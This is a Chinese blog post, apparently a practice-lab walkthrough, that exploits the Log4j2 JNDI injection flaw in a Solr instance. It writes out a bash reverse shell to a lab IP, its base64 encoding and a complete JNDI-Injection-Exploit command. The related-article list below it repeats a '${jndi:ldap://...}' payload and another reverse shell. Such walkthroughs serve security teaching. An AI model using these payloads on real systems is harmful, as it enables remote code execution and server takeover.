代码执行漏洞-Log4j2漏洞

最新推荐文章于 2024-09-08 13:57:56 发布
最新推荐文章于 2024-09-08 13:57:56 发布
阅读量526 收藏 2
点赞数 15
文章标签: log4j
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_75036923/article/details/141986681
版权

启动靶场环境

⾃⼰搭建的DNSLOG平台上获取⼀个域名来监控我们注⼊的效果..
 

可以发现 /solr/admin/cores?action= 这⾥有个参数可以传,可以按照上⾯的原理 先构造⼀个请求传过去存在JNDI注⼊那么ldap服务端会执⾏我们传上去的payload然后在DNSLOG 平台上那⾥留下记录,我们可以看到留下了访问记录并且前⾯的参数被执⾏后给我们回显了java的 版本号!

 

开始反弹Shell准备 JNDI-Injection-Exploit 下载地址并构造PayLoad如下...启动!

JDNI项⽬地址
https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0
反弹shell
bash -i >& /dev/tcp/192.168.146.136/6666 0>&1
反弹Shell-base64加密
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xMzYvNjY2NiAwPiYx
最终Payload

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xMzYvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}" -A "192.168.146.136"

服务器监听

 

拿取JDK1.8并构造Payload且直接访问..可以看到⽹⻚被重定向到了我们的恶意类⽹址. 

 

一身傲骨@
关注
  • 15
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
logging-log4j2-log4j-2.15.0-rc2.zip maven 资源库
12-31
针对Log4j 2 远程代码执行漏洞,需要用到的升级资源包,适用于maven资源库,包括log4jlog4j-core,log4j-api,log4j-1.2-api,log4j-jpa等全套2.15.0 maven资源库jar包。如果是maven本地仓库使用,需要将zip包解压...
Apache Log4j2 远程代码执行漏洞检测工具
12-15
针对这个漏洞,开发出了专门的Apache Log4j2远程代码执行漏洞检测工具,这些工具包括针对Windows和Linux操作系统的版本。这些工具的主要目的是帮助管理员和安全专家迅速识别其环境中是否存在易受攻击的Log4j2实例。 ...
代码执行漏洞-log4j2漏洞
2301_80402555的博客
09-08 313
反弹Shell-base64加密。
安全漏洞(1)-Log4j2远程代码执行漏洞log4j2漏洞验证
热门推荐
迷途的小兵
12-13 1万+
Log4j2远程代码执行漏洞log4j2漏洞验证
代码执行漏洞-Log4j2漏洞 vulhub CVE-2021-44228
2301_81525518的博客
09-08 320
action=${jndi:ldap://192.168.10.235:1389/g3fjso}${jndi:ldap://192.168.10.235:8888/uma7pn}JDNI项⽬地址 https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0。# 反弹shell bash -i >& /dev/tcp/192.168.10.235/8888 0>&1。步骤一:执行以下命令启动靶场环境并在浏览器访问!
Java框架安全篇--log4j2远程代码执行漏洞
m0_63138919的博客
04-06 1321
本文章参考网上师傅们的解题和代码审计思路,记录自己的学习过程,还希望各位博主师傅大佬勿喷,还希望大家指出错误
Log4j2远程代码执行漏洞
2301_82000839的博客
07-08 968
log4j2漏洞是java应用常见开源日志库,是一个就Java的日志记录工具Apache Log4j2中存在JNDI注入漏洞,主要原理是利用log4j2的日志输出JNDI远程对象时,调用远程对象没做检查导致,程序将用户输入的数据进行日志记录时即可触发该漏洞并可在目标服务器上执行任意代码。该漏洞利用过程需要找到一个能触发远程加载并应用配置的输入点,迫使服务器远程加载和修改配置的前提下使目标系统通过JNDI远程获取数据库源,触发攻击者的恶意代码
logging-log4j2-log4j-2.15.0-rc2.zip
12-13
- **安全补丁**:此版本主要针对CVE-2021-44228的安全漏洞进行了修复,这是一个非常严重的问题,可能导致远程代码执行Log4j 2.15.0-rc2及时响应,通过更新解决了这个问题,保障了系统的安全性。 - **性能优化**...
logging-log4j2-log4j-2.16.0-rc1.zip
12-13
这次我们关注的是"logging-log4j2-log4j-2.16.0-rc1.zip"这个压缩包,它包含了Log4j 2.16.0的Release Candidate 1版本,主要目的是修复一个严重漏洞,该漏洞可能导致远程代码执行(RCE)。 首先,我们需要了解Log4j...
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
Apache Log4j 是一个广泛使用的 Java 日志框架,它允许应用...总之,Apache Log4j 远程代码执行漏洞是一个重大安全事件,强调了在软件开发和运维过程中对安全性的重视。及时更新和维护软件库是防止此类漏洞影响的关键。
log4j靶场,反弹shell
m0_73771249的博客
09-07 877
1.用vulhub靶场搭建,首先进入目录CVE-2021-44228中,docker启动命令。2.发现端口是8983,浏览器访问http://172.16.1.18:8983/4.反弹shell到kali(ip为172.16.1.18)的8888端口。3.用dnslog平台检测dns回显,看看有没有漏洞存在。同时,我们开启对172.16.1.18:8888端口监听。输入whoami命令查看是否获得shell。然后对上述命令进行base64编码,最终 Payload。
log4j 同一线程隔离classloader下MDC信息不同问题解决 ThreadLocal问题分析
CoderCoding的博客
09-06 612
一个任务的日志信息会被莫名的拆分到两个不同目录中。经过分析,首先怀疑的是MDC没有清理的问题,这也是最直观的问题。由于线程会被重用,而MDC是绑定在Threadlocal上的,所以如果没有清理,是会造成上述问题。但是在代码检查中发现在线程的开始,是重新设置过MDC信息的。经过分析,首先怀疑的是MDC没有清理的问题,这也是最直观的问题。由于线程会被重用,而MDC是绑定在Threadlocal上的,所以如果没有清理,是会造成上述问题。但是在代码检查中发现在线程的开始,是重新设置过MDC信息的。
滚雪球学MyBatis-Plus(13):测试与部署
**My Coding Family**
09-05 849
在上期内容中,我们深入探讨了 MyBatis Plus 的高级功能,包括自定义 SQL 注解、批量操作以及数据加密与解密。这些功能极大地提高了开发效率,并增强了数据操作的灵活性和安全性。本期内容将重点介绍 MyBatis Plus 的测试与部署。我们将学习如何编写单元测试和集成测试,确保代码的正确性和可靠性。然后,我们将讨论项目的打包与部署流程,帮助你将开发的应用程序顺利发布到生产环境中。测试是软件开发过程中至关重要的一环。通过测试,我们可以验证代码的正确性,发现潜在的问题,并确保系统的稳定性。
Matlab界面GUI设计的车牌定位[Matlab界面GUI设计].zip
最新发布
09-10
linux常用命令大全
【独家首发】基于matlab沙猫群算法SCSO-GMDH风电数据回归预测【含Matlab源码 7530期】.zip
09-10
CSDN海神之光上传的全部代码均可运行,亲测可用,直接替换数据即可,适合小白; 1、代码压缩包内容 主函数:Main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,可私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开除Main.m的其他m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博主博客文章底部QQ名片; 4.1 CSDN博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 智能优化算法优化GMDH回归预测系列程序定制或科研合作方向: 4.4.1 遗传算法GA/蚁群算法ACO优化GMDH回归预测 4.4.2 粒子群算法PSO/蛙跳算法SFLA优化GMDH回归预测 4.4.3 灰狼算法GWO/狼群算法WPA优化GMDH回归预测 4.4.4 鲸鱼算法WOA/麻雀算法SSA优化GMDH回归预测 4.4.5 萤火虫算法FA/差分算法DE优化GMDH回归预测 4.4.6 其他优化算法优化GMDH回归预测
【2024首发原创】蜣螂优化算法DBO-TCN-LSTM-Multihead-Attention负荷预测Matlab实现.rar
09-10
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 替换数据可以直接使用,注释清楚,适合新手
加速仪6050陀螺仪simulink.rar
09-10
加速仪6050陀螺仪simulink.rar
基于ssm的三省学堂—学习辅助系统设计与实现.docx
09-10
基于ssm的三省学堂—学习辅助系统设计与实现.docx
apache log4j2远程代码执行漏洞检测工具
08-31
Apache Log4j2远程代码执行漏洞是一种影响Apache Log4j2日志记录库的严重安全漏洞。该漏洞允许攻击者通过发送特制的网络请求,远程执行任意代码,导致服务器完全被控制。 为了帮助检测这个漏洞,一些安全公司和社区为用户提供了相关工具。这些工具可以扫描用户的服务器和应用程序,检测是否受到Apache Log4j2远程代码执行漏洞的威胁。 这些工具通常会发送特定的请求来触发漏洞,并检查服务器的日志文件或响应,以确定是否存在漏洞。如果漏洞存在,工具将提供警告或报告,并建议相应的修复措施。 除了工具之外,用户还可以手动检查漏洞。他们可以通过编辑Log4j2的配置文件,将关键性日志记录功能设置为丢失或关闭。关闭该功能可以阻止攻击者利用漏洞,但也可能导致一些日志记录功能的失效。 为了更好地保护服务器和应用程序,用户应该尽快更新Apache Log4j2到最新版本。此外,他们还应该保持注意,及时关注安全更新和公告,并及时采取相应措施。 总之,Apache Log4j2远程代码执行漏洞检测工具是一种帮助用户发现漏洞并提供修复建议的工具。用户可以使用这些工具进行定期扫描,发现并处理潜在的漏洞,以提高系统的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值